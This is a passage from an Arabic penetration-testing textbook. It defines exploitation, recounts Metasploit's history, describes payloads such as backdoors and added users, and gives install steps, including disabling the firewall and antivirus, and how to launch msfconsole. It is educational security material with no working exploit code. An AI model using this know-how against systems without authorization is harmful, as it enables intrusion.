‫ﻧﻔﮭم أن ﻟﯾس ﻛل اﺧﺗراق ﯾؤدي إﻟﻰ اﻟﺳطو اﻟﻛﺎﻣل ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ Oracle padding exploit ،‬ﯾﻣﻛﻧﮭﺎ أن ﺗﻛﺷف ﻋن‬
‫اﻟﻣﻌﻠوﻣﺎت واﻟﺳﻣﺎح ﻟﻧﺎ ﺑﺗﺣﻣﯾل اﻟﻣﻠﻔﺎت وﻟﻛﻧﮭﺎ ﻻ ﺗﺳطو ﻋﻠﻰ اﻟﻧظﺎم ﺑﺷﻛل ﻛﺎﻣل‪ .‬ﺗﻌرﯾف أﻛﺛر دﻗﺔ‪ ،‬ﻓﺎن اﻻﺧﺗراق )‪ (Exploitation‬ھو‬
‫وﺳﯾﻠﺔ ﻟﺗﺟﺎوز ﺛﻐرة أﻣﻧﯾﺔ أو اﻟﺗﺣﺎﯾل ﻋﻠﻰ اﻟﺿواﺑط اﻷﻣﻧﯾﺔ‪ .‬ھذه اﻟﻌﻣﻠﯾﺔ ﯾﻣﻛﻧﮭﺎ أن ﺗﺗﺧذ أﺷﻛﺎﻻ ﻣﺧﺗﻠﻔﺔ وﻟﻛن ﻟﻐرض ھذا اﻟﻛﺗﺎب‪ ،‬واﻟﮭدف‬
‫اﻟﻧﮭﺎﺋﻲ ﯾﺑﻘﻰ داﺋﻣﺎ ھو ﻧﻔﺳﮫ‪ :‬اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﺳﺗوى اﻹداري )‪ (administrative-level‬ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻓﻲ ﻧواح ﻛﺛﯾرة‪ ،‬ﻓﺎن اﻻﺧﺗراق‬
‫ھو ﻣﺣﺎوﻟﺔ ﻟﺗﺣوﯾل اﻟﺟﮭﺎز اﻟﮭدف إﻟﻰ دﻣﯾﺔ ﻣن ﺷﺄﻧﮭﺎ أن ﺗﻧﻔذ اﻷواﻣر اﻟﺧﺎﺻﺔ ﺑك وﺗﻘدﯾم اﻟﻌطﺎءات اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻟﻣﺟرد أن ﻧﻛون واﺿﺣﯾن‪،‬‬
‫ﻓﺎن ﻋﻣﻠﯾﺔ اﻻﺧﺗراق )‪ (Exploitation‬ھو ﻋﻣﻠﯾﺔ إطﻼق ‪ Exploit .Exploit‬ھو ﺗﺣﻘﯾﻖ‪ ،‬ادراك‪ ،‬أو اﻛﺗﺷﺎف ﻧﻘﺎط اﻟﺿﻌف‪Exploit .‬‬
‫ھو وﺳﯾﻠﮫ أو ﺧﻠل ﻓﻲ رﻣز اﻟﺑرﻧﺎﻣﺞ اﻟﺗﻲ ﺗﻌطﻲ اﻟﻘراﺻﻧﺔ أو اﻟﻣﮭﺎﺟم اﻟﻘدرة ﻋﻠﻰ إطﻼق أو ﺗﻧﻔﯾذ اﻟﮭﺟﻣﺎت ﺿد اﻟﻧظﺎم اﻟﮭدف‪ .‬واﻟﺗﻲ ﻣن‬
‫اﻟﻣﻣﻛن ﺗﺣوﯾل اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف اﻟﻰ دﻣﯾﺔ وإﺟﺑﺎرھﺎ ﻋﻠﻰ اﻟﻘﯾﺎم ﺑﻣﺎ ﻧرﯾد‪ .‬ﯾﻣﻛﻧﮭﺎ اﯾﺿﺎ ﺗﻐﯾﯾر اﻟوظﺎﺋف اﻷﺻﻠﯾﺔ ﻟﻠﺑرﻧﺎﻣﺞ وﺗﺳﻣﺢ ﻟﻧﺎ أﯾﺿﺎ‬
‫اﻟﻘﯾﺎم ﺑﺄي ﻋدد ﻣن اﻷﻣور ﻣﺛل ﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﺟدﯾد‪ ،‬وﺗﻌطﯾل اﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﻌﻣل‪ ،‬إﺿﺎﻓﺔ ﻣﺳﺗﺧدﻣﯾن ﺟدد‪ ،‬وأﻛﺛر ﻣن ذﻟك ﺑﻛﺛﯾر‪.‬‬

‫ﻋﻣﻠﯾﺔ اﻻﺧﺗراق )‪(Exploitation‬ھﻲ واﺣدة ﻣن أﻛﺛر اﻟﻣراﺣل ﻏﻣوﺿﺎ واﻟﺗﻲ ﺳوف ﻧﻐطﯾﮭﺎ‪ .‬اﻟﺳﺑب ﻓﻲ ذﻟك ﺑﺳﯾط؛ ﻛل ﻧظﺎم ﯾﺧﺗﻠف ﻋن‬
‫اﻵﺧر وﻟﻛل ھدف ﻓرﯾد ﻣن ﻧوﻋﮫ‪ .‬اﻋﺗﻣﺎدا ﻋﻠﻰ ﻋدد واﻓر ﻣن اﻟﻌواﻣل‪ ،‬وھﺟوﻣك ﯾﺧﺗﻠف ﻣن ھدف إﻟﻰ ھدف‪ .‬أﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﻣﺧﺗﻠﻔﺔ‬
‫)‪ ،(OSs‬واﻟﺧدﻣﺎت اﻟﻣﺧﺗﻠﻔﺔ‪ ،‬واﻟﻌﻣﻠﯾﺎت اﻟﻣﺧﺗﻠﻔﺔ ﺗﺗطﻠب أﻧواﻋﺎ ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﮭﺟﻣﺎت‪ .‬اﻟﻣﮭﺎﺟﻣﯾن اﻟﻣﮭرة اﻟﺗﻲ ﺗﻔﮭم اﻟﻔروق اﻟدﻗﯾﻘﺔ ﻓﻲ ﻛل ﻧظﺎم‬
‫ﯾﺣﺎوﻟون اﺳﺗﻐﻼﻟﮭﺎ‪ .‬ﻣﻊ اﺳﺗﻣرار ﻣﮭﺎراﺗك ﻓﻲ اﻟﺗﻘدم‪ ،‬ﻓﺳوف ﺗﺣﺗﺎج ﻟﺗوﺳﯾﻊ ﻣﻌرﻓﺗك ﻟﻸﻧظﻣﺔ وﻧﻘﺎط ﺿﻌﻔﮭم‪ .‬إذا ﺗﺣدﺛﻧﺎ ﻋن اﻻﺧﺗراق ﻓﻘﺑل ﻛل‬
‫ﺷﻲء‪ ،‬ﺳوف ﻧﺗﺣدث ﻋن ‪ metasploit‬ﺣﯾث ﺗﻌﺗﺑر ھذه اﻷداة ﻣن اھم اھم أدوات اﻻﺧﺗراق‪.‬‬

‫‪METASPLOIT 5.2‬‬

‫ﻣن ﻛل اﻷدوات اﻟﺗﻲ ﻧوﻗﺷت ﻓﻲ ھذا اﻟﻛﺗﺎب واﻟﺗﻲ ﺳوف ﺗﻧﺎﻗش‪ Metasploit ،‬ھو اﻟﻣﻔﺿل‪ .‬ﻓﻲ ﻧواح ﻛﺛﯾرة‪ ،‬ھو اﻷداة اﻟﻣﺛﺎﻟﯾﺔ ﻟﻠﻘراﺻﻧﺔ‪.‬‬
‫ﺣﯾث ﯾﺗﻣﯾز ﺑﺎﻟﻘوة واﻟﻣروﻧﺔ‪ ،‬ﻣﺟﺎﻧﻲ‪ ،‬وﯾﺣﻣل ﻣﻌﮫ أدوات راﺋﻌﺔ‪ .‬ﻣن دون أدﻧﻰ ﺷك ﺗﻌﺗﺑر أروع أداة ھﺟوﻣﯾﺔ ﻣﺷﻣوﻟﺔ ﻓﻲ ھذا اﻟﻛﺗﺎب‪ ،‬وﺣﺗﻰ‬
‫ﻓﻲ ﺑﻌض اﻟﺣﺎﻻت ﻷﻧﮭﺎ ﺗﺗﯾﺢ ﻟك اﻹﺧﺗراق ﻣﺛل ھﯾو ﺟﺎﻛﻣﺎن ﻓﻲ ﻓﯾﻠم ‪ !Swordfish‬ﻋﻠﻰ ﻣﺣﻣل اﻟﺟد‪ ،‬أﻧﮭﺎ ﺟﯾدة‪ .‬ھذه اﻷداة ﺳوف ﯾﺳرد ﻟﮭﺎ‬
‫ﻛﺗﺎب ﻛﺎﻣل ﻻﺣﻘﺎ ﯾﺗﻛﻠم ﻋﻧﮭﺎ ﻧظرا ﻷھﻣﯾﺗﮭﺎ وﻟﻛﻧﻧﺎ ھﻧﺎ ﺳوف ﻧﺗﻛﻠم ﻋن اﻻﺳﺎﺳﯾﺎت ﻓﻘط‪.‬‬

‫ﻓﻲ ﻋﺎم ‪ ،2004‬ﻓﻲ ‪ ،Defcon 12‬ﻓﺎن ﻛل ﻣن اﺗش دي ﻣورى )‪ (HD Moore‬وﺳﺑوﻧم )‪ (Spoonm‬ھزوا اﻟﻌﺎﻟم ﻋﻧدﻣﺎ أﻋطوا ﻣﺣﺎﺿرة‬
‫ﺑﻌﻧوان "‪ :Metasploit‬اﻟﻘرﺻﻧﺔ ﻛﻣﺎ ﻓﻲ اﻷﻓﻼم"‪ُ .‬رﻛز ھذا اﻟﻌرض ﻋﻠﻰ " إطﺎرات اﻻﺧﺗراق )‪ ."(Exploit Frameworks‬إطﺎر‬
‫اﻻﺧﺗراق )‪ (exploit framework‬ھو ﺑﻧﯾﺔ رﺳوﻣﯾﺔ ﻟﺗطوﯾر وإطﻼق ‪ .exploit‬اﻷطر)‪ (framework‬ﺗﺳﺎﻋد ﻓﻲ ﻋﻣﻠﯾﺔ اﻟﺗﻧﻣﯾﺔ ﻣن ﺧﻼل‬
‫ﺗوﻓﯾر اﻟﺗﻧظﯾم واﻟﻣﺑﺎدئ اﻟﺗوﺟﯾﮭﯾﺔ ﻟﻛﯾﻔﯾﺔ ﺗﺟﻣﯾﻊ ﻣﺧﺗﻠف اﻟﻘطﻊ وﺗﻔﺎﻋﻠﮭم ﻣﻊ ﺑﻌﺿﮭم اﻟﺑﻌض‪.‬‬
‫‪ Metasploit‬ﺑدأت ﻓﻌﻼ ﻛﻠﻌﺑﮫ ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ ،‬وﻟﻛﻧﮭﺎ ﻗد ﺗﺣﻘﻖ ﻛﺎﻣل إﻣﻛﺎﻧﺎﺗﮭﺎ ﻋﻧدﻣﺎ ﯾﺗم ﺗﺣوﯾﻠﮭﺎ إﻟﻰ أداة ﻛﺎﻣﻠﺔ ﻓﻲ ﻋﻣﻠﯾﺔ اﻻﺧﺗراق ‪.Exploit‬‬
‫‪ Metasploit‬ﯾﺣﺗوي ﻓﻲ اﻟواﻗﻊ ﻋﻠﻰ ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻟﺗﻲ ﺗﺷﻣل اﻟﻌﺷرات ﻣن اﻟوظﺎﺋف ﻣﺧﺗﻠﻔﺔ ﻷﻏراض ﻣﺧﺗﻠﻔﺔ وﻟﻛن رﺑﻣﺎ ﯾﻔﺿل‬
‫ﻣﻌرﻓﺔ إطﺎرات اﻻﺧﺗراق )‪ (Exploit Frameworks‬اﻟﻘوﯾﺔ واﻟﻣرﻧﺔ ﻣﻧﮭﺎ‪.‬‬
‫ﻗﺑل اﻻﻓراج ﻋن ‪ ،Metasploit‬ﻛﺎن اﻟﺑﺎﺣﺛون ﻓﻲ اﻷﻣن ﻟدﯾﮭم ﺧﯾﺎرﯾن رﺋﯾﺳﯾﯾن‪ :‬اﻣﺎ ان ﯾﺗﻣﻛﻧوا ﻣن ﺗطوﯾر اﻷﻛواد اﻟﻣﺧﺻﺻﺔ ﻋن طرﯾﻖ‬
‫اﻟﺗﻔﻛﯾك ﻣﻊ ﻣﺧﺗﻠف ‪ exploit‬و‪ payloads‬أو أﻧﮫ ﯾﻣﻛن أن ﯾﺳﺗﻐل واﺣدا ﻣن اﺛﻧﯾن ﻣن )‪ (Exploit Frameworks‬اﻟﻣﺗﺎﺣﺔ ﺗﺟﺎرﯾﺎ‪،‬‬
‫‪ CORE Impact‬أو‪ . ImmunitySec’s CANVAS‬وﻛﻼھﻣﺎ ﯾﻌدوا ﺧﯾﺎرﯾن ﻋظﯾﻣﯾن وﻧﺎﺟﺣﯾن ﻟﻠﻐﺎﯾﺔ ﻓﻲ ﺣد ذاﺗﮭﻣﺎ‪ .‬وﻟﻛن ﻟﻸﺳف‪،‬‬
‫ﻓﺈن ﺗﻛﻠﻔﺔ اﻟﺗرﺧﯾص واﺳﺗﺧدام ھذه اﻟﻣﻧﺗﺟﺎت ﻋﺎﻟﻲ ﻣﻣﺎ ﯾﻌﻧﻲ اﻧﮫ ﻟم ﯾﻛن ﻟدي اﻟﻌدﯾد ﻣن اﻟﺑﺎﺣﺛﯾن ﻓﻲ ﻣﺟﺎل اﻷﻣن اﻟوﺻول إﻟﯾﮭﺎ‪.‬‬
‫ﻛﺎن ‪ Metasploit‬ﻣﺧﺗﻠﻔﺔ ﻋن ﻛل ﺷﻲء آﺧر ﻷﻧﮭﺎ اﻟﻣرة اﻷوﻟﻰ‪ ،‬اﻟﺗﻲ ﯾﺗﺎح )‪ (Exploit Frameworks‬ﻣﻔﺗوح اﻟﻣﺻدر ﻟﻛل ﻣن اﻟﻘراﺻﻧﺔ‬
‫وﻣﺧﺗﺑري اﻻﺧﺗراق ﻟﻠوﺻول إﻟﯾﮭﺎ‪ .‬وھذا ﯾﻌﻧﻲ أﻧﮫ ﻟﻠﻣرة اﻷوﻟﻰ‪ ،‬ﯾﺻﺑﺢ )‪ (Exploit Frameworks‬ﻣﺗﺎﺣﮫ ﻟﻠﺟﻣﯾﻊ‪ ،‬ﻣﻣﺎ أدى اﻟﻰ وﺟود‬
‫ﺗﻌﺎون ﺑﯾﻧﮭم‪ ،‬وﺗطوﯾر ‪ ،Exploit‬وﺗﺑﺎدﻟﮭﺎ ﻓﯾﻣﺎ ﺑﯾﻧﮭم ﻣﺟﺎﻧﺎ‪.‬‬
‫‪ Metasploit‬ﯾﺳﻣﺢ ﻟك ﺑﺎﺧﺗﯾﺎر اﻟﮭدف واﻻﺧﺗﯾﺎر ﻣن ﺑﯾن ﻣﺟﻣوﻋﺔ واﺳﻌﺔ ﻣن ‪ Payloads .payloads‬ﻗﺎﺑﻠﺔ ﻟﻠﺗﺑﺎدل وﻻ ﯾﻣﻛن رﺑطﮭﺎ‬
‫ﺒ ‪Exploit‬ﻣﺣدده‪ Payloads .‬ھﻲ "وظﺎﺋف إﺿﺎﻓﯾﺔ" أو ﺗﻐﯾﯾر ﻓﻲ اﻟﺳﻠوك اﻟذي ﺗرﯾد ﺗﺣﻘﯾﻘﮫ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ .‬ھذا ھو اﻟﺟواب ﻋﻠﻰ‬
‫اﻟﺳؤال‪" :‬ﻣﺎذا أرﯾد أن أﻓﻌل اﻵن ﻋﻠﻰ اﻟﺟﮭﺎز اﻟذي ﻟدي ﺳﯾطرة ﻋﻠﯾﮫ؟" ﺗﺷﻣل ‪ Metasploit‬ال ‪ payloads‬اﻷﻛﺛر ﺷﻌﺑﯾﺔ ھو إﺿﺎﻓﺔ‬
‫ﻣﺳﺗﺧدﻣﯾن ﺟدد‪ ،‬وﻓﺗﺢ ‪ ،backdoor‬وﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﺟدﯾد ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف‪ .‬وﺳﯾﺗم ﺗﻐطﯾﺔ ﻗﺎﺋﻣﺔ اﻟﻛﺎﻣﻠﺔ ﻠ ‪Metasploit payloads‬‬
‫ﻗرﯾﺑﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪297‬‬

‫ﻗﺑل أن ﻧﺑدأ ﻓﻲ ﺗﻐطﯾﺔ ﺗﻔﺎﺻﯾل ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ‪ ،Metasploit‬ﻓﻣن اﻟﻣﮭم أن ﻧﻔﮭم اﻟﻔرق ﺑﯾن ‪ Metasploit‬وﻓﺎﺣص ﻧﻘﺎط اﻟﺿﻌف‬
‫)‪ .(Vulnerability scanner‬ﻓﻲ ﻣﻌظم اﻟﺣﺎﻻت‪ ،‬ﻋﻧدﻣﺎ ﻧﺳﺗﺧدم ﻓﺎﺣص ﻧﻘﺎط اﻟﺿﻌف‪ ،‬اﻟﻔﺎﺣص ﺳوف ﯾﺗﺣﻘﻖ ﻓﻘط ﻟﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن‬
‫اﻟﻧظﺎم ھو ﻋرﺿﺔ ﻟﻠﺧطر‪ .‬ﯾﺣدث ھذا ﺑطرﯾﻘﺔ ﺳﻠﺑﯾﺔ أي ﻻ ﯾﺗﻔﺎﻋل ﻣﻊ اﻟﻧظﺎم اﻟﮭدف ﺟدا ﻣﻊ ﻓرﺻﺔ ﺿﺋﯾﻠﺔ ﻣن أي ﺿرر ﻏﯾر ﻣﻘﺻود أو‬
‫ﺗﻌطﯾل ﻟﮭذا اﻟﮭدف‪ .‬اﻣﺎ ‪ Metasploit‬وﻏﯾرھﺎ ﻣن ‪ Framework‬ھﻲ أدوات اﺧﺗراق‪ .‬ھذه اﻷدوات ﻻ ﺗؤدى اﺧﺗﺑﺎرات؛ وﻟﻛن ﺗﺳﺗﺧدم ھذه‬
‫اﻷدوات ﻹﻛﻣﺎل اﻻﺧﺗراق اﻟﻔﻌﻠﻲ ﻟﮭذا اﻟﮭدف‪ .‬ﻓﺎﺣص ﻧﻘﺎط اﻟﺿﻌف )‪ (Vulnerability scanner‬ﯾﺑﺣث ﻋن ﻧﻘﺎط اﻟﺿﻌف اﻟﻣﺣﺗﻣﻠﺔ وﺗﻘدﯾم‬
‫ﺗﻘرﯾر‪ Metasploit .‬ﯾﺣﺎول ﻓﻌﻼ اﺳﺗﻐﻼل ﻧﻘﺎط اﻟﺿﻌف واﺧﺗراق اﻟﻧظﺎم اﻟذى ﯾﻔﺣﺻﮫ‪ .‬ﺗﺄﻛد ﻣن أﻧك ﺗﻔﮭم ھذا‪.‬‬
‫ﻓﻲ ﻋﺎم ‪ ،2009‬ﺗم ﺷراء ‪ Metasploit‬ﻣن ﻗﺑل ‪ .Rapid 7‬أﻣﺿﻰ اﺗش دي ﻣورى )‪ (HD Moore‬ﻗدرا ﻛﺑﯾرا ﻣن اﻟوﻗت ﯾوﺿﺢ ﻟﻠﻧﺎس‬
‫ﺑﺄن ‪ Metasploit‬ﺳوف ﯾظل ﻣﺟﺎﻧﺎ‪ .‬ﻋﻠﻰ اﻟرﻏم ﻣﻧذ ذﻟك اﻟﺣﯾن ﺗم اﻻﻓراج ﻋن اﻟﻌدﯾد ﻣن اﻟﻣﻧﺗﺟﺎت اﻟﺗﺟﺎرﯾﺔ اﻟﻛﺑﯾرة ﺑﻣﺎ ﻓﻲ ذﻟك‬
‫‪ Metasploit Express‬و‪ ،Metasploit Pro‬وﻛﺎن اﺗش دي ﻣورى )‪ (HD Moore‬وﻓﯾﺎ ﻓﻲ ﻛﻠﻣﺗﮫ وﺑﻘﻲ ﻣﺷروع ‪Metasploit‬‬
‫اﻷﺻﻠﻲ ﺣر وﻣﺟﺎﻧﺎ‪ .‬ﻓﻲ اﻟواﻗﻊ‪ ،‬ﻛﺎن ﺷراء ‪ Metasploit‬ﺑواﺳطﺔ ‪ Rapid 7‬دﻓﻌﺔ ﻗوﯾﺔ ﻟﻠﻣﺷروع ‪ .Metasploit‬ﻣﺷروع ﻣﻔﺗوح اﻟﻣﺻدر‬
‫ﯾﺳﺗﻔﯾد ﺑوﺿوح ﻣن اﻷدوات اﻟﺗﺟﺎرﯾﺔ اﻟﺗﻲ ﯾﺗم دﻓﻌﮭﺎ ﻣﻊ ﺗطوﯾر ﺑدوام ﻛﺎﻣل إﺿﺎﻓﯾﺔ ودﻋم‪ .‬ﺳوف ﻧرﻛز ﻋﻠﻰ اﻷﺳﺎﺳﯾﺎت ھﻧﺎ‪ ،‬وﻟﻛن إذا ﻛﻧت‬
‫ﺗرﻏب ﻓﻲ اﻟﺑﻘﺎء ﻋﻠﻰ رأس أﺣدث اﻟﺗطورات ﻓﻲ اﻟﻣﺳﺗﻘﺑل ﻓﺎﺳﺗﻣر ﻓﻲ اﻟﺗطوﯾر‪.‬‬
‫‪ Metasploit‬ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻣﺟﺎﻧﺎ ﻣن اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://www.metasploit.com/‬‬
‫إذا ﻛﻧت ﺗﺳﺗﺧدم ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪ ،‬ﻓﺎن ‪ Metasploit‬ﻣﺛﺑت ﻓﻌﻠﯾﺎ ﺑﮫ‪ .‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻟﻠﺗﻔﺎﻋل ﻣﻊ ‪ ،Metasploit‬وﻟﻛن‬
‫ﺳﯾرﻛز ھذا اﻟﻛﺗﺎب ﻋﻠﻰ اﺳﺗﺧدام‪ ،‬واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟﻐﯾر رﺳوﻣﯾﺔ )‪ (GUI‬او ﻣﺎ ﯾﺳﻣﻰ ﺑﺎﻟوﺟﮫ اﻟﻧﺻﯾﺔ‪ ،‬واﻟذي ﯾﺳﻣﻰ ‪ .msfconsole‬ﺑﻣﺟرد‬
‫ﻓﮭم اﻷﺳﺎﺳﯾﺎت‪ ،‬ﻓﺎن ‪ msfconsole‬ﺳوف ﯾﺻﺑﺢ ﺳرﯾﻊ‪ ،‬ودي‪ ،‬ﺑدﯾﮭﻲ‪ ،‬وﺳﮭل اﻻﺳﺗﺧدام‪.‬‬

‫اﻣﺎ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻓﻧﻘوم ﺑﺗﺣﻣﯾل ﻧﺳﺧﺔ‪ Metasploit‬اﻟﻣﺧﺻﺻﺔ ﻟﻠوﯾﻧدوز ﻣن اﻟﻣوﻗﻊ اﻟﺳﺎﺑﻖ ذﻛره ﺛم اﺗﺑﺎع اﻟﺧطوات‬
‫اﻟﺗﺎﻟﯾﺔ ﻹﺗﻣﺎم ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪.‬‬
‫‪ -1‬ﺑﻌد اﻟﻘﯾﺎم ﺑﺗﺣﻣﯾل اﻹﺻدار اﻟﻣﺧﺻص ﻟﻧﺳﺦ اﻟوﯾﻧدوز ﻣن ‪ Metasploit‬ﻧﻘوم ﺑﺈﻟﻐﺎء ﺗﻔﻌﯾل ﺟدار اﻟﺣﻣﺎﯾﺔ وﺑرﻧﺎﻣﺞ ﻣﺿﺎد‬
‫اﻟﻔﯾروﺳﺎت‪.‬‬
‫‪ -2‬ﻧﻘوم ﺑﺎﻟﻧﻘر اﻟﻣزدوج ﻋﻠﻰ ‪ Installer‬اﻟذي ﻗﻣﻧﺎ ﺑﺗﺣﻣﯾﻠﮫ ﻣن ﻗﺑل ﺛم ﻧﺗﺑﻊ ‪ Wizard‬ﻓﻲ ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺣﺗﻰ ﻧﺻل اﻟﻰ اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫إذا ﻟم ﺗﻘم ﺑﻌدم اﻟﻐﺎء ﺗﻔﻌﯾل ﻛل ﻣن ﺟدار اﻟﺣﻣﺎﯾﺔ وﺑرﻧﺎﻣﺞ ﻣﺿﺎد اﻟﻔﯾروﺳﺎت ﻓﮭذا ﺳوف ﯾوﻗف ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت وﯾؤدى اﻟﻰ ظﮭور‬ ‫‪-3‬‬
‫رﺳﺎﻟﺔ ﺗﺧﺑرك ﺑﺎﻧﮫ ﯾﺟب اﻟﻐﺎء ﺗﻔﻌﯾل ﺟدار اﻟﺣﻣﺎﯾﺔ‪.‬‬
‫ﺛم ﺑﻌد ذﻟك ﻧﻧﻘر ﻓوق ‪ Next‬واﻟﺗﻲ ﺗذھب اﻟﻰ ﺷﺎﺷﮫ أﺧرى ﯾرﯾد ﻣﻧك ﻓﯾﮫ وﺿﻊ اﻟﻣﻧﻔذ اﻟذي ﺳوف ﯾﺳﺗﺧدﻣﮫ اﻟﺗطﺑﯾﻖ‪ .‬ﻧدﺧل ﻣﻧﻔذ‬ ‫‪-4‬‬
‫‪ SSL‬ﻟﻛﻲ ﯾﺳﺗﺧدﻣﮫ ﺧدﻣﺔ ‪ Metasploit‬ﺛم ﻧﻧﻘر ﻓوق ‪ .Next‬اﻓﺗراﺿﯾﺎ‪ ،‬ﯾﺳﺗﺧدم ﺧﺎدم اﺑﺎﺗﺷﻲ اﻟﻣﻧﻔذ ‪ 3790‬ل‪ . HTTPS‬إذا ﻛﺎن‬
‫اﻟﻣﻧﻔذ ﻣﻧﺿم ﺑﺎﻟﻔﻌل إﻟﻰ ﻋﻣﻠﯾﺔ أﺧرى‪ ،‬ﺗﺣدﯾد ﻣﺎ إذا ﻛﺎن ﻋﻣﻠﯾﺔ ﯾﺗم اﻻﺳﺗﻣﺎع ﻋﻠﻰ ھذا اﻟﻣﻧﻔذ وﻏﻠﻖ اﻟﻌﻣﻠﯾﺔ‪ ،‬أو ﯾﻣﻛﻧك إدﺧﺎل ﻣﻧﻔذ‬
‫آﺧر ﻣن ھذا اﻟﻘﺑﯾل ﻛﻣﺎ ‪ 8080‬أو ‪.442‬‬
‫ﻧﺗرك اﻹﻋدادات اﻻﻓﺗراﺿﯾﺔ ﻛﻣﺎ ھﻲ ﺛم ﻧﻘر ﻓوق ‪ Next‬وﻋﻧد اﻻﻧﺗﮭﺎء ﻣن ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﻧﻧﻘر ﻓوق ‪.Finish‬‬ ‫‪-5‬‬
‫ﻧﻘوم اﻻن ﺑﺗﺷﻐﯾل ‪ Metasploit‬وذﻟك ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-6‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪298‬‬

‫‪Start > Programs > Metasploit > Access Metasploit UI‬‬


‫او ﻛﺗﺎﺑﺔ ﻋﻧوان ‪ URL‬اﻟﺗﺎﻟﻲ ‪ https://localhost:3790‬ﻓﻲ ﻣﺗﺻﻔﺢ اﻟوﯾب اﻟﺧﺎص ﺑك‪.‬‬
‫‪ -7‬ﻋﻧد ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ ﻧﺧﺗﺎر ‪ add exception‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -8‬ﺗظﮭر ﺷﺎﺷﮫ أﺧرى ﺗﺿﻊ ﻓﯾﮭﺎ اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ ﺑك‪.‬‬

‫)‪MASTERING THE METASPLOIT CONSOLE (MSFCONSOLE‬‬

‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬ﺳوف ﻧدرس وﺣدة اﻟﺗﺣﻛم ‪ .(msfconsole) Metasploit‬ﯾﺗم اﺳﺗﺧدام ‪ msfconsole‬ﻓﻲ اﻟﻣﻘﺎم اﻷول ﻹدارة ﻗﺎﻋدة ﺑﯾﺎﻧﺎت‬
‫‪ ،Metasploit‬وإدارة اﻟﺟﻠﺳﺎت‪ ،‬وﺗﻛوﯾن وإطﻼق وﺣدات ‪ .Metasploit‬ﻓﮭو أﺳﺎﺳﻲ‪ ،‬ﻷﻏراض اﻻﺧﺗراق‪ ،‬ﻓﺈن ‪ msfconsole‬ﯾﺣﺻل‬
‫ﻋﻠﻰ اﺗﺻﺎل إﻟﻰ اﻟﻣﺿﯾف اﻟﮭدف ﺑﺣﯾث ﯾﻣﻛﻧﮫ إطﻼق ‪ exploit‬اﻟﺧﺎص ﺿدھﺎ‪.‬‬
‫أﺳﮭل طرﯾﻘﺔ ﻟﻠوﺻول إﻟﻰ ‪ msfconsole‬ھو ﻣن ﺧﻼل ﻓﺗﺢ اﻟﺗرﻣﻧﺎل وإدﺧﺎل اﻟﺳطر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#msfconsole‬‬
‫ﯾوﺟد طرﯾﻘﮫ أﺧرى ﻟﺗﺷﻐﯾل ‪ Metasploit‬ﻓﻲ اﻟﺑﯾﺋﺔ اﻟرﺳوﻣﯾﺔ وذﻟك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ ‪ msfgui‬ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫ﻛﻣﺎ ﯾﻣﻛن اﻟوﺻول إﻟﻰ ‪ msfconsole‬ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب‪ .‬ﺑدء ‪ msfconsole‬ﯾﺳﺗﻐرق ﻣﺎ ﺑﯾن ‪ 10‬ﺛﺎﻧﯾﺔ و‪30‬‬
‫ﺛﺎﻧﯾﺔ‪ ،‬ﻟذﻟك ﻻ داﻋﻲ ﻟﻠذﻋر إذا ﻟم ﯾﺣدث ﺷﻲء ﻟﺑﺿﻊ ﻟﺣظﺎت‪ .‬ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف‪ ،‬ﺳوف ﺗﺑدأ ‪ Metasploit‬ﻣن ﺧﻼل ﺗﻘدﯾم ﻟﻛم ﻣﻊ ﻻﻓﺗﺔ‬
